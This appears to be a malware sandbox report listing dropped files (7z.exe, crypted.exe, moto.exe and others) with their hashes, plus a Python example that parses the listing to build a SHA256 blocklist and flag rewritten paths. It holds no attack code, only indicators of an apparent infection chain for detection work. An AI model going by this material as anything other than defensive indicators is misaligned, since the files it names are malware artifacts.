SHA256 7f14840b37e1c1adde6b5f1f4f0ab78e3e81cba44b818dcc0b174e275896a132
SHA512 0a6eff6c34087877c2eaa9e42776838267e346b58e6eeff2871b7d24b64f766596131121b3b3ef126427fdd90fdc2bc991629439760a5869f4baf77362809b82

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 16ca0bc7585cf1e4c8c5c34b6f951d3b
SHA1 ffecf71a91f425f096a8fac9da43ffa3d3c0c014
SHA256 3144be5415398f4405652df7d6720291cdec7edd100df47cbe49835699f141f6
SHA512 7c5a0cf83b243a5e9f46a5957d941bf63ed862f0f72f91528acfc5355b66595348f2a258247f51a027a7448edc9230feca2f038ecf7cc6dc0ad4e344988283b5

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 15214aea50a7dee7b6185ebb47cfa02d
SHA1 8f058b905075fb8f56c600a4a1ae7292ac8c084b
SHA256 f61a1a6a40231469e8d583142499bdf6d8e1afd789d6b6210a094017b39b81a2
SHA512 d15312b203cb0c340ab05df82cc04994558cf2db474633341cdcfc7aa0526a905de020316025da7a076c286baa7b048bb2dfddfa85d47a4249e91ae70e1b7663

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 cd97e76fbcd1772e560bba64a9a88328
SHA1 0cf63dd47f641d3677c1ec5b6b3170a053b0a317
SHA256 a3c033b0ce6b7c83bcbf67217c69c784989a5f86762590381b252d0bdb11595f
SHA512 462e5695543feb735967b56725edc22ee146413caa40738bb6a1ddc50cd0eede129446d90d9ad172d3fb9df49a04f3f1c955ba5ede94e75d5fac6aba14247237

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 3358165ad5c35097c5e1e9c37dc399c2
SHA1 e3a5586505ee4a9d538dacc33c28212289b9452c
SHA256 768a1a8302a1446d38920b7fe7256a4d3856c95f2205862e4cdee16d3b2d0ee3
SHA512 1104e734e6733270ab5798bce7b9406cd5832d5d08f681902973530fe3908926b89bb9db4035ea89d230ac3534bbeb2363ee1a1fc6562f78f8f70cef66153d8f

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 1fc06478fd2cc9d5c0cef0857cfeaf2f
SHA1 92dc8241b0f1f27e0377e69ed8ecdf385b2c4d6c
SHA256 318216247c723b8fe6b0878987f939ab2e3a661fa6e71a52ea175411413a757d
SHA512 7b37fcb721dc3cf7a45204624f334860f7ee0d8d3ef6752b1390e09861c3558bd4efd2b5addb255ffcd53ec6652626cfb5dad07f28520a6a1988fea4023e89fb

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 02da322d2fe9e0df40c62516b4a98bd0
SHA1 fa97f1c362b47cc97e57194a9a75c4c6d4153b8e
SHA256 1fa81bbdde339a3bffb0db18bec6c8fda808ccaba522721554365662eb020a5f
SHA512 0e4513d4e8ec7ef40b7ad29e1ed2b5ceb27652c124e10ecf7c996b4c5498fe3ec9d91d01a091d48344edaba66754d16395392bba462f130638bf734705d207c2

C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe

MD5 b93bf1838e0b44908b1c1a58777efb90
SHA1 385d3b361e4ca010f630e2307dd79673b831507c
SHA256 84f50dc193d9f169a1b9a86c22107bad6d04ae3096e3c04c28933bd610d73083
SHA512 9888daf013c9d50ac448d1082d08a0e798bc90e239e5e1f02552ceb2837f76189fa37668169444eba50d326b2beb2521aa3718a0a246fa1aab9f6ba5d381efd0

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_8.zip

MD5 aaa97cae61f10770ab65892fb10b827d
SHA1 0f5f5b27b4603a2a9a6d778263ca402d22fc964f
SHA256 96767258e636d6cd1334d3ca67a1d9f483a090a78d9bafbd3a7bc8837ec998c3
SHA512 dde8270e6699050ce428bfb442d95089b97ad2c351efe9d5d9898a4cd0ded3f5e88f22572a6aecb72a0250b4f3f76ddf933f9853f5761d5676719c886d15d295

C:\ProgramData\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_9.zip

MD5 8d857afd113f8e64a832b278b9604bd1
SHA1 2f607fc29f7c09ae609b443cb65670050b9c39f8
SHA256 235b77b3053e7bd736d1c21f1f9d2613c788994e1d7d4ae485356641bc526f6a
SHA512 a4c932de8e4a7f28dd889c079231ed69d48d179c0372c3f0925903c0d6c7cdfba313284b057f5d25e55fdaf36cc6210a00f13598eb2cadbf375da83896982fae

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 29aa7fc9d902766b1075687887f60723
SHA1 f5bf65b12678fa6a58534fd47e21254c3670d790
SHA256 052288712592e8582d37c5010dc13c343a2ead03cb3c65befb9325f57d4e7eb8
SHA512 9097c56f3f00d32df22057b8bbd2ef6cbabcadd1721d51ed85991529e6b39a39afa32317729230aca8e5c5bbb6847b8578f517f47e326ad0fa2fbd6839f70b25

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 0d1483bbb90b69c55346ec23c96c6938
SHA1 f92ab72a18ca9c499f0a395bed2d67a68f5c2105
SHA256 7b447c28d899f1051f5307c38269110a3a08dedd4fb501fc946a168b619ce175
SHA512 d01f7722b37dc9e6972128d315fbf39e3e08510c6e493e18c312943959a85eebf68d24488ce3f2210623c78a2a2bd57ef1ae51bbc624bbf8742017ef09afb9dc

C:\Users\Admin\AppData\Local\Temp\main\file.bin

MD5 0f7a3aae5699388c187be3676d512e46
SHA1 b656fbe7c66e54f087f1de59c29272bab6dd23c8
SHA256 d549b30fee766442ddd9a1183e8f2138aeeda4a07327f82fb7c428e835a41dcd
SHA512 066d688fb3caf8b57c0c05d0b33be0836657e64a20fdf02fe6d1f77ebc7433f1bf97d3b6adcc77dd6042c173d8bd3db1967b4bb157c938ad545c91bfffa38758

C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe

MD5 fdf2afc3a93ffe6b5e19258ddecffe18
SHA1 796c91413df92bc144e3a9a0ca737e459cf4b9d2
SHA256 eaa2c2c9da8144e6fa976c45f087bcfaa45bdbe63811810dcce6c99d580f0489
SHA512 ea82b7b571367ca10edcdec79fc9cc52e85db4ccc5ce3217182c6c1510db42e805fda0db84a6853ce8b8c483332b42cfbe0011b55b37d5c6b49ca8ce677c449b

C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe

MD5 c92705e6a009b8a4fd627b3c3b0853e9
SHA1 ce1f490cdca4d3db46f9b0001d89e140952c2cfa
SHA256 cf11cbd40c628719b70450784c2beaca71b04efc051154b138325b3dbf197cd3
SHA512 9cf7b30d8fb308b99dcb91341a05efb9db3ff4eecc708c6a0bbbbb715ed54f2d6a8c1630826c14676a6c0e66ee719b5a87d04fc8b620708bed53e9ec0e42fecd

C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe

MD5 c98b4f3e5cc2fce9d69c28ef8d33e7bf
SHA1 c5761bb1ead153ec9ea9ce1ffdf4aff015211dff
SHA256 c38f9a19c8b92b7fcc23f7308051033ee3ebed11be130072ba312900ce61baf9
SHA512 250a4731e06553994481f0b53470cde132bb8795cdc835bd035dea7b5b8163d9e04f74d9ad023fc215a0e450add94182690bd37e78395a2c2a010958cb726c8d
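The dropped-file listing above is the raw material an analyst turns into indicators, and it carries one detail that is easy to miss when reading hash blocks by eye: the same path (C:\Users\Admin\AppData\Local\Temp\main\7z.exe) is written four times with four different SHA256 values, so a file-path match alone is a weak indicator while the hash set is strong. The following added example, which is not part of the sandbox report, parses this listing format (a path line, then one hash per line), validates each hash as hex of the expected length, collects the SHA256 set for blocklisting, and reports paths that were written with more than one distinct hash. The embedded sample is a subset of the entries above copied as they appear, with the SHA512 lines left out for brevity (they parse identically); the function names are the example's own.

```python
import re
from collections import defaultdict

# Expected hex digest lengths for the algorithms the report lists.
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")

# Constructed sample: entries copied from the dropped-files listing in this
# report (SHA512 lines omitted). The first block has no preceding path line,
# mirroring how the section starts mid-entry.
SAMPLE = r"""
MD5 cd97e76fbcd1772e560bba64a9a88328
SHA1 0cf63dd47f641d3677c1ec5b6b3170a053b0a317
SHA256 a3c033b0ce6b7c83bcbf67217c69c784989a5f86762590381b252d0bdb11595f

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 1fc06478fd2cc9d5c0cef0857cfeaf2f
SHA1 92dc8241b0f1f27e0377e69ed8ecdf385b2c4d6c
SHA256 318216247c723b8fe6b0878987f939ab2e3a661fa6e71a52ea175411413a757d

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 02da322d2fe9e0df40c62516b4a98bd0
SHA1 fa97f1c362b47cc97e57194a9a75c4c6d4153b8e
SHA256 1fa81bbdde339a3bffb0db18bec6c8fda808ccaba522721554365662eb020a5f

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 29aa7fc9d902766b1075687887f60723
SHA1 f5bf65b12678fa6a58534fd47e21254c3670d790
SHA256 052288712592e8582d37c5010dc13c343a2ead03cb3c65befb9325f57d4e7eb8

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 0d1483bbb90b69c55346ec23c96c6938
SHA1 f92ab72a18ca9c499f0a395bed2d67a68f5c2105
SHA256 7b447c28d899f1051f5307c38269110a3a08dedd4fb501fc946a168b619ce175

C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe

MD5 fdf2afc3a93ffe6b5e19258ddecffe18
SHA1 796c91413df92bc144e3a9a0ca737e459cf4b9d2
SHA256 eaa2c2c9da8144e6fa976c45f087bcfaa45bdbe63811810dcce6c99d580f0489

C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe

MD5 c92705e6a009b8a4fd627b3c3b0853e9
SHA1 ce1f490cdca4d3db46f9b0001d89e140952c2cfa
SHA256 cf11cbd40c628719b70450784c2beaca71b04efc051154b138325b3dbf197cd3

C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe

MD5 c98b4f3e5cc2fce9d69c28ef8d33e7bf
SHA1 c5761bb1ead153ec9ea9ce1ffdf4aff015211dff
SHA256 c38f9a19c8b92b7fcc23f7308051033ee3ebed11be130072ba312900ce61baf9
"""


def parse_dropped_files(text):
    """Parse 'path / hash lines' blocks into records.

    Each record is {"path": str|None, "hashes": {algo: hexdigest},
    "problems": [str]}. A hash block with no preceding path (as at the
    top of the listing) gets path None rather than being silently
    attached to the wrong file.
    """
    records = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[0] in HASH_LEN:
            if current is None:
                current = {"path": None, "hashes": {}, "problems": []}
                records.append(current)
            algo, value = parts
            current["hashes"][algo] = value.lower()
            if not HEX_RE.match(value) or len(value) != HASH_LEN[algo]:
                current["problems"].append(f"{algo} malformed: {value}")
        else:
            # Anything that is not an "ALGO hex" line starts a new file entry.
            current = {"path": line, "hashes": {}, "problems": []}
            records.append(current)
    return records


def sha256_set(records):
    """Distinct SHA256 values, suitable for a blocklist or hunt query."""
    return {r["hashes"]["SHA256"] for r in records if "SHA256" in r["hashes"]}


def overwritten_paths(records):
    """Paths written more than once with differing content (by SHA256)."""
    seen = defaultdict(set)
    for r in records:
        if r["path"] and "SHA256" in r["hashes"]:
            seen[r["path"]].add(r["hashes"]["SHA256"])
    return {p: sorted(h) for p, h in seen.items() if len(h) > 1}


if __name__ == "__main__":
    recs = parse_dropped_files(SAMPLE)
    print(f"{len(recs)} entries, {len(sha256_set(recs))} distinct SHA256")
    for path, digests in overwritten_paths(recs).items():
        print(f"rewritten {len(digests)}x: {path}")
    for r in recs:
        for p in r["problems"]:
            print(f"warning: {r['path']}: {p}")
```

Running the block on the sample reports eight entries with eight distinct SHA256 values and flags the 7z.exe path as rewritten four times. Treat a rewritten path this way as a hint that the staging directory is reused across download rounds, so detection should key on the hashes (or on the parent-process and network behaviour elsewhere in this report) rather than on the path string.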